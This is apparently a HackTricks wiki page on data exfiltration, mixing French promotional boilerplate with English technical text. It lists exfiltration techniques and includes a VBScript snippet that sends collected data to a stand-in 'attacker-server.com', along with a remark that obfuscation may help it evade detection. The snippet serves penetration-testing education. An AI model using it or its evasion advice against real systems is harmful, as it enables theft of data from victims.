<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
Trouvez les vulnérabilités les plus importantes afin de les corriger plus rapidement. Intruder suit votre surface d'attaque, lance des analyses de menaces proactives, trouve des problèmes dans l'ensemble de votre pile technologique, des API aux applications web et aux systèmes cloud. [**Essayez-le gratuitement**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) aujourd'hui.
Trouvez les vulnérabilités les plus importantes afin de pouvoir les corriger plus rapidement. Intruder suit votre surface d'attaque, lance des analyses de menaces proactives, trouve des problèmes dans l'ensemble de votre pile technologique, des API aux applications web et aux systèmes cloud. [**Essayez-le gratuitement**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) aujourd'hui.
Exfiltration is the unauthorized transfer of data from a target system. There are various methods to exfiltrate data, including:
- **Exfiltration Over Command and Control Channel**: Attackers can use the existing command and control channel to exfiltrate data from the target system.
- **Exfiltration Over Alternative Protocol**: Attackers can use alternative protocols such as DNS, ICMP, or HTTPS to exfiltrate data in a covert manner.
- **Exfiltration Over Unencrypted Protocols**: Attackers can exfiltrate data over unencrypted protocols such as HTTP or FTP.
- **Exfiltration Over Encrypted Protocols**: Attackers can exfiltrate data over encrypted protocols such as HTTPS or SSH to avoid detection.
- **Exfiltration Using Steganography**: Attackers can hide data within images, audio files, or other digital media to exfiltrate information without detection.
- **Exfiltration Using Covert Channels**: Attackers can use covert channels to exfiltrate data, such as encoding data within DNS queries or using timing channels.
- **Exfiltration Using Data Compression**: Attackers can compress data before exfiltrating it to minimize the amount of data transferred and avoid detection.
- **Exfiltration Using Data Fragmentation**: Attackers can fragment data into smaller pieces and exfiltrate them individually to avoid detection.
- **Exfiltration Using Encryption**: Attackers can encrypt exfiltrated data to prevent unauthorized access and maintain data confidentiality.
- **Exfiltration Using Out-of-Band Communication**: Attackers can exfiltrate data using out-of-band communication channels, such as using a separate network connection or covert channel.
Understanding the various exfiltration methods is crucial for detecting and preventing data exfiltration attempts during security assessments.
VBScript can be used to exfiltrate data from a compromised system. This can be achieved by sending data to an external server controlled by the attacker. The following code snippet demonstrates a simple exfiltration technique using VBScript:
```vbscript
Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")
url = "http://attacker-server.com/data=" & data
objXMLHTTP.open "GET", url, False
objXMLHTTP.send
```
In this code snippet, the `data` variable contains the information to be exfiltrated. The script creates an XMLHTTP object, appends the data to the URL, sends a GET request to the attacker's server, and transmits the data.
It is important to note that exfiltrating data using VBScript can be detected by security tools, so additional obfuscation techniques may be necessary to avoid detection.
Le programme `debug.exe` permet non seulement l'inspection des binaires, mais a également la **capacité de les reconstruire à partir de l'hexadécimal**. Cela signifie qu'en fournissant un hexadécimal d'un binaire, `debug.exe` peut générer le fichier binaire. Cependant, il est important de noter que debug.exe a une **limite d'assemblage de fichiers jusqu'à 64 ko en taille**.
Trouvez les vulnérabilités les plus importantes afin de pouvoir les corriger plus rapidement. Intruder suit votre surface d'attaque, lance des analyses de menaces proactives, trouve des problèmes dans l'ensemble de votre pile technologique, des API aux applications web et aux systèmes cloud. [**Essayez-le gratuitement**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) aujourd'hui.
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.